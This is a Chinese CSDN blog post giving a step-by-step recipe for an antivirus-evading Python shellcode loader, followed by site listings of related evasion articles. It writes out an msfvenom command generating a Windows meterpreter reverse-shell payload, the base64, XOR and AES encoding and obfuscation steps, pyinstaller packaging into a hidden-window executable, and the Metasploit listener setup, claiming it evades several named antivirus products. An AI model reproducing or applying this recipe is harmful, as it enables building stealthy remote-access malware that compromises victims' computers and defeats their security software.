Pythonshellcode编码+混淆免杀

已于 2022-09-18 10:53:53 修改
阅读量1.7k 收藏 8
点赞数 2
分类专栏: 免杀 文章标签: python windows web安全 网络安全
于 2022-09-18 10:48:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45888826/article/details/126914855
版权

Python免杀shellcode加载器

一、工具介绍

免杀方式:

  1. msfvenom生成raw格式的shellcode–>base64–>XOR–>AES,
  2. 将python代码缩小并混淆最后生成exe
  3. 2022.9.18目前能过DF、360,电脑管家,火绒

二、安装与使用

1、获取项目

git clone https://github.com/HZzz2/python-shellcode-loader.gitcd python-shellcode-loaderpip install -r .requirements.txt

2、生成shellcode msfvenom方式,或者生成CS马raw的shellcode

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw

3、base64编码shellcode并替换jiami.py中的值

#base64
base64 -w 0 -i rev.raw > rev.bs64
cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'
vim jiami.py

4、加密base64并替换main.py中的值

#加密base64后的shellcode
python3 jiami.py
#会生成一个aes-xor.txt的文件
cat aes-xor.txt
复制文件里的值(经过XOR和AES加密后)复制的值替换main.py中的payload 
vim main.py
也就是第四十一行 jiami_sc='payload'

5、缩小和混淆py代码

缩小python代码
pyminify main.py --output main-mini.py
vim main-mini.py
混淆main-mini.py中的python代码https://pyob.oxyry.com/在线混淆
混淆后的代码放到main-mini-ob.py
vim main-mini-ob.py

在这里插入图片描述

6、打包成可执行文件exe

#打包成exe,kali命令如下
pyinstaller -Fw -i .setting.ico --key=leslie main-mini-ob.py
但是提示我缺少模块,懒得下了,我就放Windows里打包一下了
pyinstaller.exe -Fw -i setting.ico --key=leslie main-mini-ob.py 
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥等待打包完成,打包好后的可执行程序在dist目录中

在这里插入图片描述

7、kali用msf进行监听本地4444端口

msfconsole
use  exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 127.0.0.1
set lport 4444

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
8.可以看到免杀效果不错的
9.感谢HZzz2师傅做的免杀,真的香~

Affectedfish
关注
专栏目录
python 混淆源码
11-24
python 混淆源码,代码是2.7的 ,可以混淆3.5和2.7的源码,具体有什么问题未知,我只是改了一下输入输出方式,其最源码是在https://github.com/astrand/pyobfuscate 12年前老代码了,仅供参考
shellcode 免杀 ——python3
时光凉春衫薄的博客
12-28 1890
python shellcode 免杀上线
Python ShellCode
最新发布
qq_69100706的博客
08-12 373
Python经常被用作编写脚本来辅助分析、自动化任务、破解密码或利用二进制程序的工具。然而,当涉及到Shellcode(一种用于控制系统执行流程的机码)时,Python通常不是直接执行Shellcode的语言,因为它是一种解释型的高级语言,而Shellcode是直接在目标系统上执行的机码。尽管如此,Python可以在CTF竞赛中用于生成、编码、解码和测试Shellcode
python加载shellcode免杀
qq_43884092的博客
10-12 1106
编码,生成混淆后的shellcode加载,写入文件a.txt。可以过卡巴斯基静态和动态特征正常上线(这里使用的payload为。可以过火绒静态和动态特征正常上线,但无法过360和卡巴斯基。将加密和编码后的shellcode加载代码通过网络下载。pyinstaller进行打包(打包前删除所有注释)编码,生成混淆后的shellcode加载。可以过360静态和动态特征正常上线。可以过360静态和动态特征正常上线。可以过火绒静态和动态特征正常上线。可以过火绒静态和动态特征正常上线。
词达人小工具2
m0_61369360的博客
04-27 338
【代码】词达人小工具2。
免杀方法(四)Python免杀shellcode加载
qq_56426046的博客
10-03 1238
免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES将python代码缩小并混淆最后生成exe目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等。
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1388
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机码,因为经常让攻击者获得shell而得名。shellcode常常使用机语言编写。可在暂存eip溢出后,塞入一段可让CPU执行的shellcode码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
远控免杀源码,最新教程+源码
10-21
通常,免杀技术包括混淆、加密、动态加载、多态性等手段,使得恶意代码在执行时不易被反病毒引擎识别。在远程控制软件中应用免杀技术,可以使攻击者更难被追踪,从而增加其隐蔽性和持久性。 源码是程序的基础,通过...
免杀源码+暗组免杀源码编译 Gh0st3.6
09-06
1. **混淆编码**:为了防止反病毒软件通过静态分析识别恶意代码,开发者会使用各种混淆技术,如字符串加密、指令重排、自定义编码等,使得代码难以理解和分析。 2. **动态加载与运行**:恶意软件可能不包含完整功能...
〖教程〗Ladon九种PowerShell混淆免杀方法
K8哥哥
07-15 959
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell Power
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
总的来说,Python加载shellcode免杀是一种实用的技巧,结合不同的编码、加密和混淆技术,可以有效降低被反病毒软件检测到的风险。然而,随着杀毒软件技术的发展,免杀技术也需要不断更新和优化,以应对新的挑战。...
python混淆工具
02-08
python混淆工具
最新免杀360,基于shellcode字符混淆
06-22
基于Shellcode的字符混淆是一种常见的技术,用于使恶意代码逃避反病毒软件和其他安全解决方案的检测。壳代码(Shellcode)是一段非常短小的机码,通常用于实现特定的功能,如创建后门或执行命令行。由于其精简性和直接性,壳代码往往难以被检测,尤其是当它被混淆后。 字符混淆的基本原理 字符混淆的目标是改变壳代码的外观,而不会影响其功能。以下是几种常见的字符混淆方法: 异或(XOR)加密: 在壳代码的每个字节上应用一个密钥进行异或运算。 在运行时,使用相同的密钥再次异或解密,恢复原始壳代码。 异或操作的特点是两次相同的操作会相互抵消,因此可以用来加密和解密。 插入随机字符: 在壳代码的关键字节之间插入随机字符或指令。 这些插入的字符必须在运行时被跳过或忽略,以确保壳代码的正确执行。 编码/解码: 将壳代码转换成不同的格式,如Base64编码。 在执行前,需要对编码后的壳代码进行解码。 变形和动态加载: 动态地生成壳代码,使其在每次执行时都有所不同。 使用特殊的加载来处理变形的壳代码,并在内存中正确设置和执行。 实现示例 下面是一个使用Python进行简单异或混淆的例子:
go混淆实现bypassAV(cobaltstrike免杀
qq_32445755的博客
02-09 958
近两年随着hw和红蓝对抗的增多,接触到的提权、内网渗透、域渗透也越来越多。攻击能力有没有提升不知道,但防护水平明显感觉提升了一大截,先不说防护人员的技术水平如果,最起码各种云WAF、防火墙、隔离设备部署的多了,服务上也经常能见到安装了杀软、软waf、agent等等,特别是某数字杀软在国内服务上尤为普及。这个时候,不会点免杀技术就非常吃亏了。
如何用python编写shellcode并且免杀
m0_46682482的博客
08-13 1234
大家好,我是铁汉fhoenix,今天和大家聊聊shellcode。 什么是shellcode 我在这里简单讲一下什么是ShellcodeShellcode实际是一段代码(也可以是填充数据),是用来发送到服务利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务的。 今天 让我来教大家如何编写py shellcode并且免杀,注入,以及转换成windows可执行文件 利用生成cpu可执行的代码 msfvenom -p windows/x64/exec
python免杀shellcode案例
kiihuang的博客
04-10 311
简单的病毒绕过免杀,完成加壳操作。
Python代码混淆处理
TENCENTSYS的博客
07-13 1682
今天给大家介绍的是一款名叫Intensio-Obfuscator的专业代码混淆处理工具,广大Python开发人员以及安全专家可以使用这款工具来对v2.x以及v3.x版本的Python代码进行混淆处理。 工具简介 Intensio-Obfuscator可以直接将Python源代码进行转换,并输出经过混淆处理后的Python代码。它会自动将变量名、类名以及函数名替换为随机字符,并定义长度,移除注释内容...
Python 混淆源代码
qq_37704755的博客
10-07 440
发现好多python混淆库要么不能用要么操作复杂,所以写了这个简易轻量的源码,可自行扩展 #!/usr/bin/python3 # -*- coding: UTF-8 -*- """ @Author: Cliang """ import re openfile = input('文件名:') text = open(openfile, encoding='utf-8').read() wd_df = re.findall('\ndef (\w*)\(', text) # 查找定义的方法名称
免杀基本知识,shellcode混淆免杀
白帽子凯哥聊黑客
06-17 1295
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
shellcode混淆
05-19
Shellcode混淆是一种技术,旨在通过更改shellcode的结构或使用加密技术来使其难以被检测和分析。以下是一些常见的shellcode混淆技术: 1. 标签混淆:通过使用不同的标签和跳转指令,来混淆shellcode中的控制流程。 2. 编码混淆:通过使用base64、hex等编码技术来对shellcode进行编码,从而隐藏其真实含义。 3. 堆栈混淆:通过向堆栈中添加无用数据或利用堆栈溢出来混淆控制流程。 4. 多次加密:通过多次加密和解密,使得shellcode难以被分析。 5. 反调试技术:通过检测调试的存在并改变其行为,来避免被调试。 需要注意的是,虽然这些技术可以增加shellcode安全性,但是也会增加其执行的复杂度和时间开销。因此,在使用这些技术时需要权衡安全性和性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值